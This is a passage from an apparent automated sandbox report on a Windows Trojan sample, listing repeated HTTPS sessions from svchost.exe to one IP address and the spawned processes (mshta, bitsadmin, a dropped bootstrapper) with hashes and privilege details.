17 | 192.168.2.4 | 49764 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:59 UTC | 212 | OUT | |
2024-09-16 10:22:59 UTC | 421 | IN | |
2024-09-16 10:22:59 UTC | 24 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
18 | 192.168.2.4 | 49765 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:03 UTC | 212 | OUT | |
2024-09-16 10:23:03 UTC | 422 | IN | |
2024-09-16 10:23:03 UTC | 348 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
19 | 192.168.2.4 | 49766 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:07 UTC | 212 | OUT | |
2024-09-16 10:23:07 UTC | 422 | IN | |
2024-09-16 10:23:07 UTC | 389 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
20 | 192.168.2.4 | 49767 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:11 UTC | 212 | OUT | |
2024-09-16 10:23:11 UTC | 422 | IN | |
2024-09-16 10:23:11 UTC | 173 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
21 | 192.168.2.4 | 49768 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:14 UTC | 212 | OUT | |
2024-09-16 10:23:14 UTC | 422 | IN | |
2024-09-16 10:23:14 UTC | 154 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
22 | 192.168.2.4 | 49770 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:17 UTC | 212 | OUT | |
2024-09-16 10:23:17 UTC | 421 | IN | |
2024-09-16 10:23:17 UTC | 83 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
23 | 192.168.2.4 | 49771 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:20 UTC | 212 | OUT | |
2024-09-16 10:23:20 UTC | 422 | IN | |
2024-09-16 10:23:20 UTC | 157 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
24 | 192.168.2.4 | 49772 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:23 UTC | 212 | OUT | |
2024-09-16 10:23:23 UTC | 422 | IN | |
2024-09-16 10:23:23 UTC | 283 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
25 | 192.168.2.4 | 49773 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:26 UTC | 212 | OUT | |
2024-09-16 10:23:26 UTC | 421 | IN | |
2024-09-16 10:23:26 UTC | 81 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
26 | 192.168.2.4 | 49774 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:29 UTC | 212 | OUT | |
2024-09-16 10:23:29 UTC | 420 | IN | |
2024-09-16 10:23:29 UTC | 9 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
27 | 192.168.2.4 | 49775 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:33 UTC | 212 | OUT | |
2024-09-16 10:23:33 UTC | 421 | IN | |
2024-09-16 10:23:33 UTC | 81 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
28 | 192.168.2.4 | 49776 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:37 UTC | 212 | OUT | |
2024-09-16 10:23:37 UTC | 421 | IN | |
2024-09-16 10:23:37 UTC | 82 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
29 | 192.168.2.4 | 49777 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:42 UTC | 212 | OUT | |
2024-09-16 10:23:42 UTC | 422 | IN | |
2024-09-16 10:23:42 UTC | 144 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
30 | 192.168.2.4 | 49778 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:46 UTC | 212 | OUT | |
2024-09-16 10:23:46 UTC | 422 | IN | |
2024-09-16 10:23:46 UTC | 229 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
31 | 192.168.2.4 | 49779 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:50 UTC | 212 | OUT | |
2024-09-16 10:23:50 UTC | 421 | IN | |
2024-09-16 10:23:50 UTC | 93 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
32 | 192.168.2.4 | 49780 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:54 UTC | 212 | OUT | |
2024-09-16 10:23:54 UTC | 422 | IN | |
2024-09-16 10:23:54 UTC | 136 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
33 | 192.168.2.4 | 49781 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:57 UTC | 212 | OUT | |
2024-09-16 10:23:58 UTC | 421 | IN | |
2024-09-16 10:23:58 UTC | 28 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
34 | 192.168.2.4 | 49782 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:24:01 UTC | 212 | OUT | |
2024-09-16 10:24:02 UTC | 422 | IN | |
2024-09-16 10:24:02 UTC | 149 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
35 | 192.168.2.4 | 49783 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:24:06 UTC | 212 | OUT | |
2024-09-16 10:24:06 UTC | 421 | IN | |
2024-09-16 10:24:06 UTC | 93 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
36 | 192.168.2.4 | 49784 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:24:10 UTC | 212 | OUT | |
2024-09-16 10:24:10 UTC | 422 | IN | |
2024-09-16 10:24:10 UTC | 249 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
37 | 192.168.2.4 | 49785 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:24:14 UTC | 212 | OUT | |
2024-09-16 10:24:14 UTC | 422 | IN | |
2024-09-16 10:24:14 UTC | 229 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
38 | 192.168.2.4 | 49786 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:24:19 UTC | 212 | OUT | |
2024-09-16 10:24:19 UTC | 422 | IN | |
2024-09-16 10:24:19 UTC | 180 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
39 | 192.168.2.4 | 49787 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:24:23 UTC | 212 | OUT | |
2024-09-16 10:24:23 UTC | 421 | IN | |
2024-09-16 10:24:23 UTC | 80 | IN |
Target ID: | 0 |
Start time: | 06:22:19 |
Start date: | 16/09/2024 |
Path: | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xb90000 |
File size: | 1'010'176 bytes |
MD5 hash: | 7AFABB528CE69E3A40DEC6C3253EF854 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 1 |
Start time: | 06:22:20 |
Start date: | 16/09/2024 |
Path: | C:\Windows\SysWOW64\mshta.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x850000 |
File size: | 13'312 bytes |
MD5 hash: | 06B02D5C097C7DB1F109749C45F3F505 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | false |
Target ID: | 2 |
Start time: | 06:22:20 |
Start date: | 16/09/2024 |
Path: | C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x226e67e0000 |
File size: | 995'840 bytes |
MD5 hash: | 90FD25CED85FE6DB28D21AE7D1F02E2C |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Antivirus matches: |
|
Reputation: | low |
Has exited: | true |
Target ID: | 3 |
Start time: | 06:22:20 |
Start date: | 16/09/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 06:22:21 |
Start date: | 16/09/2024 |
Path: | C:\Windows\SysWOW64\bitsadmin.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x910000 |
File size: | 186'880 bytes |
MD5 hash: | F57A03FA0E654B393BB078D1C60695F3 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | false |
Target ID: | 5 |
Start time: | 06:22:21 |
Start date: | 16/09/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 06:22:22 |
Start date: | 16/09/2024 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6eef20000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 12 |
Start time: | 06:22:31 |
Start date: | 16/09/2024 |
Path: | C:\Windows\System32\WerFault.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6cdd30000 |
File size: | 570'736 bytes |
MD5 hash: | FD27D9F6D02763BDE32511B5DF7FF7A0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |